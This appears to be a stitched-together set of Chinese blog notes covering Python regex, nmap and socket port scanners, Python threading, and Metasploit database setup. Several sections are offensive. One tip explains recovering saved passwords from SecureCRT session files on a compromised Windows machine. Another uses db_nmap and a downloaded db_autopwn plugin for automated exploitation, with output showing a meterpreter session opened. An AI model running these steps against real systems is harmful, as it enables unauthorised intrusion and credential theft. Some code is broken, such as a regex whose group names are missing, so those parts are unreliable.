原来用python多行匹配的时候都是用[\s\S] 今天发现使用re.S即可匹配多行
1)如果你要多行匹配,那么需要加上re.S和re.M标志. 加上re.S后, .将会匹配换行符,默认.不会匹配换行符. 代码如下:
str = "a23b\na34b"
re.findall(r"a(\d+)b.+a(\d+)b", str)
#输出[] #因为不能处理str中间有\n换行的情况
re.findall(r"a(\d+)b.+a(\d+)b", str, re.S)
#s输出[(’23’, ’34’)] 2)加上re.M后,^$标志将会匹配每一行,默认^和$只会匹配第一行. 代码如下:
str = "a23b\na34b"
re.findall(r"^a(\d+)b", str)
#输出[’23’] re.findall(r"^a(\d+)b", str, re.M)
#输出[’23’, ’34’]

logstash中自定义正则就是使用了这种方式
将%{SYNTAX:SEMANTIC} 写为(?<SEMANTIC>regexp)
这种情况我们可以使用(?P<name>…)这个正则表达式来提取. 举例,如果我们有一行webserver的access日志:'192.168.0.1 25/Oct/2012:14:46:34 "GET /api HTTP/1.1" 200 44 "http://abc.com/search" "Mozilla/5.0"',我们想提取这行日志里面所有的内容,可以写多个(?P<name>expr)来提取,其中name可以更改为你为该位置字符串命名的变量,expr改成提取位置的正则即可. 代码如下:

import re
line ='192.168.0.1 25/Oct/2012:14:46:34 "GET /api HTTP/1.1" 200 44 "http://abc.com/search" "Mozilla/5.0"'
reg = re.compile('^(?P[^ ]*) (?P[^ ]*) "(?P[^"]*)" (?P[^ ]*) (?P[^ ]*) "(?P[^"]*)" "(?P[^"]*)"')
regMatch = reg.match(line)
linebits = regMatch.groupdict()
print linebits
for k, v in linebits.items() :
print k+": "+v

返回结果为:
E:\Python27\python.exe E:/Pycharm/node.py
{'status': '200', 'referrer': 'http://abc.com/search', 'request': 'GET /api HTTP/1.1', 'user_agent': 'Mozilla/5.0', 'date': '25/Oct/2012:14:46:34', 'size': '44', 'remote_ip': '192.168.0.1'}
status: 200
referrer: http://abc.com/search
request: GET /api HTTP/1.1
user_agent: Mozilla/5.0
date: 25/Oct/2012:14:46:34
size: 44
remote_ip: 192.168.0.1

Process finished with exit code 0

# -*- coding: utf8 -*-
from time import strftime, localtime
from datetime import timedelta, date
import time
import json
import datetime
import sqlite3
import os
import nmap
import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )
def nmapscan(ip):
    nm = nmap.PortScanner()
    nm.scan(hosts=ip,ports='80,3306,9200')
    print nm.scaninfo()
    print nm.command_line() 
    for host in nm.all_hosts():
        for proto in nm[host].all_protocols():
            lport = nm[host][proto].keys()
            lport.sort()
            count_port = len(lport)
            i = 0
            while i < count_port:
                in_port = lport[i]
                if nm[host][proto][in_port]['state'] == 'open':
                    print host + ":" + str(in_port) + " => " + nm[host][proto][in_port]['name']
                i+=1
if __name__ == '__main__':
    start = time.time()
    nmapscan('10.59.0.116')
    end = time.time()
    print "程序执行时间:" + str(int(end - start)) + "s"

执行结果为:
[root@server120 tmp]# python thread.py
{‘tcp’: {‘services’: ‘80,3306,9200’, ‘method’: ‘syn’}}
nmap -oX – -p 80,3306,9200 -sV 10.59.0.116
10.59.0.116:80 => http
10.59.0.116:9200 => wap-wsp
程序执行时间:90s

默认的执行参数如下:
nmap -oX – -p 80,3306,9200 -sV 10.59.0.116
使用-sV会尝试探测端口的服务类型/具体版本等信息,速度慢一些,可以尝试修改nmap参数
nm.scan(hosts=ip,arguments=’-sS -p 80,3306,9200′)
执行结果:
[root@server120 tmp]# python thread.py
{‘tcp’: {‘services’: ‘80,3306,9200’, ‘method’: ‘syn’}}
nmap -oX – -sS -p 80,3306,9200 10.59.0.116
10.59.0.116:80 => http
10.59.0.116:9200 => wap-wsp
程序执行时间:5s
可以看出执行时间缩短了很多

# -*- coding: utf8 -*-
import socket
import sys
import threading
import time
import Queue
TIMEOUT = 2
reload(sys)
sys.setdefaultencoding( "utf-8" )
def scan(ip, port, timeout=TIMEOUT):
    try:
        print "Scan " + ip + "  " + str(port)
        cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        cs.settimeout(float(timeout))
        address = (str(ip), int(port))
        status = cs.connect_ex((address))
        if status == 0:
            print "%s ==> %d" % (ip,port)
    except Exception, e:
        print "error:%s" % e
    finally:
        cs.close()
class Scan(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
    def run(self):
        while True:
            try:
                if queue.empty(): break
                queue_task = self.queue.get()
                ip = queue_task.split(':')[0]
                port = int(queue_task.split(':')[1])
                scan(ip,port)
            except:
                break
def get_ip_list(ip):
    ip_list = []
    iptonum = lambda x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])])
    numtoip = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)])
    if '-' in ip:
        ip_range = ip.split('-')
        ip_start = long(iptonum(ip_range[0]))
        ip_end = long(iptonum(ip_range[1]))
        ip_count = ip_end - ip_start
        if ip_count >= 0 and ip_count <= 65536:
            for ip_num in range(ip_start,ip_end+1):
                ip_list.append(numtoip(ip_num))
        else:
            print 'ERROR'
    else:
        ip_split = ip.split('.')
        net = len(ip_split)
        if net == 2:
            for b in range(1, 255):
                for c in range(1, 255):
                    ip = "%s.%s.%d.%d" % (ip_split[0], ip_split[1], b, c)
                    ip_list.append(ip)
        elif net == 3:
            for c in range(1, 255):
                ip = "%s.%s.%s.%d" % (ip_split[0], ip_split[1], ip_split[2], c)
                ip_list.append(ip)
        elif net == 4:
            ip_list.append(ip)
        else:
            print "ERROR"
    return ip_list
if __name__ == '__main__':
    queue = Queue.Queue()
    port = ['80','9200','443','3306']
    ip = '192.168.190.1-192.168.190.50'
    for ipaddress in get_ip_list(ip):
        for p in port:
            queue.put(ipaddress+":"+p)
    threads = []
    num = 10 #设置线程数
    for x in xrange(0, num):
        t_scan = Scan(queue)
        threads.append(t_scan)
    for t in threads:
        t.start()
    for t in threads:
        t.join()

先看一段程序:


import threading,time
from time import sleep, ctime
def now() :
return str( time.strftime( '%Y-%m-%d %H:%M:%S' , time.localtime() ) )
def test(nloop, nsec):
print 'start loop', nloop, 'at:', now()
sleep(nsec)
print 'loop', nloop, 'done at:', now()
def main():
print 'starting at:',now()
threadpool=[] for i in xrange(3):
th = threading.Thread(target= test,args= (i,2))
threadpool.append(th)
#th.setDaemon(True)
for th in threadpool:
th.start()
print 'all Done at:', now()
if __name__ == '__main__':
main()

如果不加join和setDaemon的话,输出如下:

123

如果添加join(),输出如下:
for th in threadpool :
threading.Thread.join( th )

123

可以看到主线程是最后才结束的,join() 的作用是,在子线程完成运行之前,这个子线程的父线程将一直被阻塞。
然后我们添加一下setDeamon
for i in xrange(3):
th = threading.Thread(target= test,args= (i,2))
threadpool.append(th)
th.setDaemon(True)

123

可以看到主线程结束之后,子线程也会结束。
我们可以添加锁试验一下:

import threading,time
from time import sleep, ctime
def now() :
return str( time.strftime( '%Y-%m-%d %H:%M:%S' , time.localtime() ) )
def test(nloop, nsec):
mutex.acquire()
print 'start loop', nloop, 'at:', now()
sleep(nsec)
print 'loop', nloop, 'done at:', now()
mutex.release()
def main():
print 'starting at:',now()
threadpool=[] for i in xrange(3):
th = threading.Thread(target= test,args= (i,2))
threadpool.append(th)
#th.setDaemon(True)
for th in threadpool:
th.start()
for th in threadpool :
threading.Thread.join( th )
print 'all Done at:', now()
if __name__ == '__main__':
mutex = threading.Lock()
main()


输出如下:

123

Python的多线程是鸡肋,只能在单核上跑,在任意时间只有一个Python解释器在解释Python bytecode。但是Python的多线程也并非一无是处。
如果你的代码是CPU密集型,多个线程的代码很有可能是线性执行的。所以这种情况下多线程是鸡肋,效率可能还不如单线程因为有context switch。
如果你的代码是IO密集型,多线程可以明显提高效率。例如爬虫,因为绝大多数时间爬虫是在等待socket返回数据。
CPU密集型的代码可以选择使用multiprocessing库。

threading模块里面主要是对一些线程的操作对象化,创建Thread的class。一般来说,使用线程有两种模式:
A 创建线程要执行的函数,把这个函数传递进Thread对象里,让它来执行。
B 继承Thread类,创建一个新的class,将要执行的代码 写到run函数里面。

第一种 创建线程要执行的函数,把这个函数传递进Thread对象里,让它来执行。

import threading,time
from time import sleep, ctime
def now() :
    return str( time.strftime( '%Y-%m-%d %H:%M:%S' , time.localtime() ) )

def test(nloop, nsec):
    print 'start loop', nloop, 'at:', now()
    sleep(nsec)
    print 'loop', nloop, 'done at:', now()

def main():
    print 'starting at:',now()
    threadpool=[]

    for i in xrange(3):
        th = threading.Thread(target= test,args= (i,2))
        threadpool.append(th)

    for th in threadpool:
        th.start()

    for th in threadpool :
        threading.Thread.join( th )

    print 'all Done at:', now()

if __name__ == '__main__':
        main()

第二种:继承Thread类,创建一个新的class,将要执行的代码 写到run函数里面。

import threading ,time
from time import sleep, ctime
def now() :
    return str( time.strftime( '%Y-%m-%d %H:%M:%S' , time.localtime() ) )

class myThread (threading.Thread) :
      """docstring for myThread"""
      def __init__(self, nloop, nsec) :
          super(myThread, self).__init__()
          self.nloop = nloop
          self.nsec = nsec

      def run(self):
          print 'start loop', self.nloop, 'at:', ctime()
          sleep(self.nsec)
          print 'loop', self.nloop, 'done at:', ctime()
def main():
     thpool=[]
     print 'starting at:',now()
    
     for i in xrange(10):
         thpool.append(myThread(i,2))
       
     for th in thpool:
         th.start()
   
     for th in thpool:
         th.join()
    
     print 'all Done at:', now()

if __name__ == '__main__':
        main()

进入Windows机器如果装有securecrt的话,可以将CRT目录下保存的session文件拷贝出来使用
https://github.com/gitPoc32/Forensic/blob/master/VanDykeSecureCRT/SecureCRT-decryptpass.py来破解密码。

需要先安装wget https://pypi.python.org/packages/source/p/pycrypto/pycrypto-2.6.1.tar.gz –no-check-certificate

一、数据库连接配置
1)开启服务
service postgresql start
查看端口5432
root@kali-vincent:~# netstat -anlp | grep post
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN 25851/postgres
2)进入postgresql配置
sudo -u postgres psql
alter user postgres with password ‘admin’;
3)修改linux系统的postgres用户的密码(密码与数据库用户postgres的密码相同)
root@kali:~# sudo passwd -d postgres
passwd:密码过期信息已更改。
root@kali:~# sudo -u postgres passwd
输入新的 UNIX 密码:
重新输入新的 UNIX 密码:
passwd:已成功更新密码
4)管理PostgreSQL用户和数据库
root@kali:~# psql -U postgres -h 127.0.0.1
postgres=# create user msf with password ‘admin’ nocreatedb;
CREATE ROLE

postgres=# create database msf with owner=msf;
CREATE DATABASE
postgres=# \q
5)msf配置连接
root@kali:~# msfconsole
msf > db_status
[*] postgresql selected, no connection
msf > db_connect msf:admin@127.0.0.1/msf
[*] Rebuilding the module cache in the background…
msf > db_status
[*] postgresql connected to msf
msf >
db_connect -y /usr/share/metasploit-framework/config/database.yml
6)配置自动连接
修改/usr/share/metasploit-framework/config/database.yml
development: &pgsql
adapter: postgresql
database: msf
username: msf
password: admin
host: localhost
port: 5432
pool: 5
timeout: 5
输入db_status验证一下数据库连接
msf > db_status
[*] postgresql connected to msf

二、扫描入库
在msfconsole中使用db_nmap命令启动扫描,可以将结果自动存储在数据库中。
msf > db_nmap -sS -A 172.16.100.134
查看扫描结果
msf > services
[-] The db_services command is DEPRECATED
[-] Use services instead

Services
========

host port proto name state info
—- —- —– —- —– —-
172.16.100.134 22 tcp ssh open OpenSSH 5.3 protocol 2.0
172.16.100.134 23 tcp telnet open
172.16.100.134 80 tcp http open Apache httpd 2.2.15 (CentOS)
172.16.100.134 111 tcp rpcbind open 2-4 RPC #100000
172.16.100.134 873 tcp rsync open protocol version 30
172.16.100.134 2222 tcp tcpwrapped open
查看数据库中的目标信息
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
172.16.100.134 00:0c:29:b0:78:39 Linux 2.6.X server
可以使用hosts -d ip来删除IP
查看msf版本
msf > version
Framework: 4.11.4-2015071403
Console : 4.11.4-2015071403.15168
4.5以前的版本已经移除了db_autopwn自动化攻击。下载
http://download.csdn.net/download/terrying/5063334
放到/usr/share/metasploit-framework/plugins下。
db_autopwn -t -p -e(自动工具所有的ip)
msf > db_autopwn -t -p -e
然后可以看到获得了meterpreter
[*] Meterpreter session 3 opened (172.16.100.128:55153 -> 172.16.100.166:10413) at 2016-07-02 11:10:23 +0800